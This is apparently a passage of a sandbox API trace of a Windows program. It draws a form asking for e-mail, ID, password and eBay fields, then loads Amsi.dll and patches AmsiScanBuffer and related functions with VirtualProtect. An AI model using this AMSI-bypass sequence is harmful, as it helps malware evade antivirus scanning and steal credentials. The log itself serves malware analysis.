SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.722] DrawTextA (in: hdc=0xa0100d0, lpchText="??? ????:", cchText=9, lprc=0x19fd8d, format=0x440 | out: lpchText="??? ????:", lprc=0x19fd8d) returned 13 [0093.723] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.723] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.723] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.723] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.723] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.723] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.723] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.724] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.724] GetSysColor (nIndex=8) returned 0x0 [0093.724] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.724] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.724] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.724] UnrealizeObject (h=0x2d10099f) returned 1 [0093.724] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.724] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.724] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.724] DrawTextA (in: hdc=0xa0100d0, lpchText="???? ????????:", cchText=14, lprc=0x19fd8d, format=0x440 | out: lpchText="???? ????????:", lprc=0x19fd8d) returned 13 [0093.724] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.724] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.724] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.724] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.724] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.724] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.724] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.725] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.725] GetSysColor (nIndex=8) returned 0x0 [0093.725] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.725] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.725] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.725] UnrealizeObject (h=0x2d10099f) returned 1 [0093.725] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.725] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.725] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.725] DrawTextA (in: hdc=0xa0100d0, lpchText="E-mail ????????:", cchText=16, lprc=0x19fd8d, format=0x440 | out: lpchText="E-mail ????????:", lprc=0x19fd8d) returned 13 [0093.725] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.725] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.725] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.725] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.725] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.726] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.726] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.726] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.726] GetSysColor (nIndex=8) returned 0x0 [0093.726] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.726] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.726] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.726] UnrealizeObject (h=0x2d10099f) returned 1 [0093.726] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.726] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.726] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.726] DrawTextA (in: hdc=0xa0100d0, lpchText="ID ????????:", cchText=12, lprc=0x19fd8d, format=0x440 | out: lpchText="ID ????????:", lprc=0x19fd8d) returned 13 [0093.726] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.726] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.727] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.727] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.727] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.727] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.727] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.727] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.727] GetSysColor (nIndex=8) returned 0x0 [0093.727] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.727] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.727] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.727] UnrealizeObject (h=0x2d10099f) returned 1 [0093.727] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.727] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.727] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.727] DrawTextA (in: hdc=0xa0100d0, lpchText="?????? ?? ????????:", cchText=19, lprc=0x19fd8d, format=0x440 | out: lpchText="?????? ?? ????????:", lprc=0x19fd8d) returned 13 [0093.727] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.727] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.727] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.728] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.728] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.728] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.728] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.728] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.728] GetSysColor (nIndex=8) returned 0x0 [0093.728] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.728] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.728] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.728] UnrealizeObject (h=0x2d10099f) returned 1 [0093.728] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.728] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.728] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.728] DrawTextA (in: hdc=0xa0100d0, lpchText="?????? ?? ?????:", cchText=16, lprc=0x19fd8d, format=0x440 | out: lpchText="?????? ?? ?????:", lprc=0x19fd8d) returned 13 [0093.728] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.728] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.728] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.729] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.729] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.729] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.729] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.729] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.729] GetSysColor (nIndex=8) returned 0x0 [0093.729] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.729] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.729] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.729] UnrealizeObject (h=0x2d10099f) returned 1 [0093.729] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.729] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.729] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.729] DrawTextA (in: hdc=0xa0100d0, lpchText="???????????? ??????:", cchText=20, lprc=0x19fd8d, format=0x440 | out: lpchText="???????????? ??????:", lprc=0x19fd8d) returned 13 [0093.729] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.729] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.729] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.730] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.730] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.730] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.730] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.730] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.730] GetSysColor (nIndex=8) returned 0x0 [0093.730] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.730] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.730] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.730] UnrealizeObject (h=0x2d10099f) returned 1 [0093.730] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.730] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.730] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.730] DrawTextA (in: hdc=0xa0100d0, lpchText="???? ? ????? ????????? ???????? ????:", cchText=37, lprc=0x19fd8d, format=0x440 | out: lpchText="???? ? ????? ????????? ???????? ????:", lprc=0x19fd8d) returned 13 [0093.731] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.731] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.731] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.731] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.731] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.731] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.732] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.732] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.732] GetSysColor (nIndex=8) returned 0x0 [0093.732] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.732] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.732] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.732] UnrealizeObject (h=0x2d10099f) returned 1 [0093.732] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.732] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.732] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.732] DrawTextA (in: hdc=0xa0100d0, lpchText="??????????:", cchText=11, lprc=0x19fd8d, format=0x440 | out: lpchText="??????????:", lprc=0x19fd8d) returned 13 [0093.732] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.732] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.732] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.732] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.732] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.732] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.733] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.733] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3 [0093.733] CreateFontIndirectA (lplf=0x19fcf0) returned 0x280a099b [0093.733] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0093.733] GetSysColor (nIndex=8) returned 0x0 [0093.733] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.733] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.733] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.733] UnrealizeObject (h=0x2d10099f) returned 1 [0093.733] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.733] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.733] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.733] DrawTextA (in: hdc=0xa0100d0, lpchText="Date/Time is...", cchText=15, lprc=0x19fd8d, format=0x440 | out: lpchText="Date/Time is...", lprc=0x19fd8d) returned 13 [0093.736] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.736] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.736] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0093.736] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.736] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.736] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.736] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.737] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.737] GetSysColor (nIndex=8) returned 0x0 [0093.737] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.737] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.737] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.737] UnrealizeObject (h=0x2d10099f) returned 1 [0093.737] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.737] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.737] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.737] DrawTextA (in: hdc=0xa0100d0, lpchText="???? ? ????? ?????????:", cchText=23, lprc=0x19fd8d, format=0x440 | out: lpchText="???? ? ????? ?????????:", lprc=0x19fd8d) returned 13 [0093.737] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.737] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.737] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.737] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.737] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.737] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.737] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.738] SelectObject (hdc=0xa0100d0, h=0x280a099c) returned 0x18a0048 [0093.738] GetSysColor (nIndex=8) returned 0x0 [0093.738] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.738] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.738] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.738] UnrealizeObject (h=0x2d10099f) returned 1 [0093.738] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.738] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.738] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.738] DrawTextA (in: hdc=0xa0100d0, lpchText="???? ????????? ?????? ?? ????:", cchText=30, lprc=0x19fd8d, format=0x440 | out: lpchText="???? ????????? ?????? ?? ????:", lprc=0x19fd8d) returned 13 [0093.738] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.738] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.738] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099c [0093.738] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.738] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.738] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.739] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.739] SelectObject (hdc=0xa0100d0, h=0x710a0691) returned 0x18a0048 [0093.739] GetSysColor (nIndex=8) returned 0x0 [0093.739] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.739] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.739] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.739] UnrealizeObject (h=0x2d10099f) returned 1 [0093.739] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.739] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.739] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.739] DrawTextA (in: hdc=0xa0100d0, lpchText="ID/?????:", cchText=9, lprc=0x19fd8d, format=0x440 | out: lpchText="ID/?????:", lprc=0x19fd8d) returned 13 [0093.739] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.739] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.739] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x710a0691 [0093.739] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.739] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.740] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.740] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.740] SelectObject (hdc=0xa0100d0, h=0x710a0691) returned 0x18a0048 [0093.740] GetSysColor (nIndex=8) returned 0x0 [0093.740] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.740] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.740] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.740] UnrealizeObject (h=0x2d10099f) returned 1 [0093.740] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.740] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.740] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.740] DrawTextA (in: hdc=0xa0100d0, lpchText="E-mail:", cchText=7, lprc=0x19fd8d, format=0x440 | out: lpchText="E-mail:", lprc=0x19fd8d) returned 13 [0093.740] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.740] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.740] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x710a0691 [0093.740] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.740] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.741] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.741] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.741] SelectObject (hdc=0xa0100d0, h=0x710a0691) returned 0x18a0048 [0093.741] GetSysColor (nIndex=8) returned 0x0 [0093.741] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.741] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.741] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.741] UnrealizeObject (h=0x2d10099f) returned 1 [0093.741] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.741] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.741] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.741] DrawTextA (in: hdc=0xa0100d0, lpchText="??????:", cchText=7, lprc=0x19fd8d, format=0x440 | out: lpchText="??????:", lprc=0x19fd8d) returned 13 [0093.741] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.741] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.741] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x710a0691 [0093.741] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.741] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.742] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.742] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.742] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0093.742] GetSysColor (nIndex=8) returned 0x0 [0093.742] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.742] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.742] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.742] UnrealizeObject (h=0x2d10099f) returned 1 [0093.742] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.742] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.742] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.742] DrawTextA (in: hdc=0xa0100d0, lpchText="e-Bay:", cchText=6, lprc=0x19fd8d, format=0x440 | out: lpchText="e-Bay:", lprc=0x19fd8d) returned 13 [0093.743] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.743] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.743] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0093.743] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.743] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.743] GetDC (hWnd=0x0) returned 0xa0100d0 [0093.743] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0093.743] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0093.743] GetSysColor (nIndex=8) returned 0x0 [0093.743] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0093.743] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0093.743] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0093.743] UnrealizeObject (h=0x2d10099f) returned 1 [0093.743] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0093.743] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0093.743] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0093.743] DrawTextA (in: hdc=0xa0100d0, lpchText="???????? ??????????:", cchText=20, lprc=0x19fd8d, format=0x440 | out: lpchText="???????? ??????????:", lprc=0x19fd8d) returned 13 [0093.744] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0093.744] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0093.744] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0093.744] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19fd78 | out: lppt=0x19fd78) returned 1 [0093.744] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] GetCurrentThreadId () returned 0x13b0 [0093.744] SetEvent (hEvent=0x210) returned 1 [0093.744] SetEvent (hEvent=0x208) returned 1 [0093.744] SetErrorMode (uMode=0x8000) returned 0x0 [0093.744] LoadLibraryA (lpLibFileName="zipcontainer") returned 0x0 [0093.768] SetErrorMode (uMode=0x0) returned 0x8000 [0093.768] SetErrorMode (uMode=0x8000) returned 0x0 [0093.768] LoadLibraryA (lpLibFileName="smartscreenps") returned 0x0 [0093.769] SetErrorMode (uMode=0x0) returned 0x8000 [0093.769] AddMIMEFileTypesPS () returned 0x80040111 [0093.781] SetErrorMode (uMode=0x8000) returned 0x0 [0093.782] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0094.413] SetErrorMode (uMode=0x0) returned 0x8000 [0094.413] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0094.413] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiOpenSession") returned 0x6f873f70 [0094.413] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0094.413] GetCurrentProcess () returned 0xffffffff [0094.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0094.413] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0094.414] FreeLibrary (hLibModule=0x6f870000) returned 1 [0094.415] SetErrorMode (uMode=0x8000) returned 0x0 [0094.415] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0094.436] SetErrorMode (uMode=0x0) returned 0x8000 [0094.436] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0094.437] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiInitialize") returned 0x6f873d40 [0094.437] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0094.688] GetCurrentProcess () returned 0xffffffff [0094.688] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0094.689] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0094.689] FreeLibrary (hLibModule=0x6f870000) returned 1 [0094.690] SetErrorMode (uMode=0x8000) returned 0x0 [0094.690] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0094.695] SetErrorMode (uMode=0x0) returned 0x8000 [0094.695] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0094.695] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanString") returned 0x6f8740e0 [0094.695] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0094.779] GetCurrentProcess () returned 0xffffffff [0094.779] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0094.779] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0094.780] FreeLibrary (hLibModule=0x6f870000) returned 1 [0094.781] SetErrorMode (uMode=0x8000) returned 0x0 [0094.781] LoadLibraryA (lpLibFileName="Amsi") returned 0x6f870000 [0094.789] SetErrorMode (uMode=0x0) returned 0x8000 [0094.789] GetModuleHandleA (lpModuleName="Amsi") returned 0x6f870000 [0094.789] GetProcAddress (hModule=0x6f870000, lpProcName="AmsiScanBuffer") returned 0x6f874020 [0094.790] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x4) returned 1 [0094.957] GetCurrentProcess () returned 0xffffffff [0094.957] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x4a6c90, dwSize=0x5) returned 1 [0094.957] VirtualProtect (in: lpAddress=0x4a6c90, dwSize=0x5, flNewProtect=0x4, lpflOldProtect=0x19fc00 | out: lpflOldProtect=0x19fc00*=0x40) returned 1 [0094.958] FreeLibrary (hLibModule=0x6f870000) returned 1 